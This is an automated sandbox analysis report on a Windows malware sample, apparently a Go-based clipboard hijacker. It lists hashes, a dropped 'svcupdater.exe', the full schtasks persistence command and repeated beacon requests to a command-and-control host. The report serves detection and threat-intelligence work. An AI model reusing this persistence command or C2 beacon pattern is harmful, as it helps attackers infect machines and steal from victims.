Analysis
-
max time kernel
291s -
max time network
295s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
02/11/2022, 22:18 UTC
Static task
static1
Behavioral task
behavioral1
Sample
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
Resource
win10-20220812-en
General
-
Target
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
-
Size
4.8MB
-
MD5
80750ddfb5cfe9eb8e2adac60f372534
-
SHA1
a720efe2b3ef7735efd77de698a5576b36068d07
-
SHA256
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
-
SHA512
bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f
-
SSDEEP
49152:RAM2vrGxtRJHHc1RmqAhaShRgdGMYYqWxvdTBB0IEqYjla27EdS5g+A:mMgGxtU1RmqA3xsquvPEdZi+A
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3976 svcupdater.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3996 schtasks.exe -
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 4 Go-http-client/1.1 HTTP User-Agent header 7 Go-http-client/1.1 HTTP User-Agent header 8 Go-http-client/1.1 HTTP User-Agent header 10 Go-http-client/1.1 HTTP User-Agent header 11 Go-http-client/1.1 -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2712 wrote to memory of 3512 2712 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe 66 PID 2712 wrote to memory of 3512 2712 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe 66 PID 3512 wrote to memory of 3996 3512 cmd.exe 68 PID 3512 wrote to memory of 3996 3512 cmd.exe 68
Processes
-
C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe"C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\cmd.execmd.exe "/C schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"2⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\schtasks.exeschtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"3⤵
- Creates scheduled task(s)
PID:3996
-
-
-
C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exeC:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe1⤵
- Executes dropped EXE
PID:3976
Network
-
Remote address:8.8.8.8:53Requestclipper.guruIN AResponseclipper.guruIN A45.159.189.115
-
GEThttp://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
GEThttp://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
GEThttp://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
GEThttp://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
GEThttp://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
GEThttp://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestclipper.guruIN AResponseclipper.guruIN A45.159.189.115
-
GEThttp://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
GEThttp://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
GEThttp://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
GEThttp://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7svcupdater.exeRemote address:45.159.189.115:80RequestGET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
322 B 7
-
45.159.189.115:80http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7httpsvcupdater.exe679 B 1.6kB 7 6
HTTP Request
GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
429HTTP Request
GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
200 -
45.159.189.115:80http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7httpsvcupdater.exe679 B 1.6kB 7 6
HTTP Request
GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
429HTTP Request
GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
200 -
45.159.189.115:80http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7httpsvcupdater.exe679 B 1.6kB 7 6
HTTP Request
GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
429HTTP Request
GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
200 -
45.159.189.115:80http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7httpsvcupdater.exe725 B 1.6kB 8 7
HTTP Request
GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
429HTTP Request
GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
200 -
45.159.189.115:80http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7httpsvcupdater.exe587 B 1.5kB 5 4
HTTP Request
GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
429HTTP Request
GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7HTTP Response
200
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.8MB
MD580750ddfb5cfe9eb8e2adac60f372534
SHA1a720efe2b3ef7735efd77de698a5576b36068d07
SHA256876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
SHA512bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f
-
Filesize
4.8MB
MD580750ddfb5cfe9eb8e2adac60f372534
SHA1a720efe2b3ef7735efd77de698a5576b36068d07
SHA256876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
SHA512bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f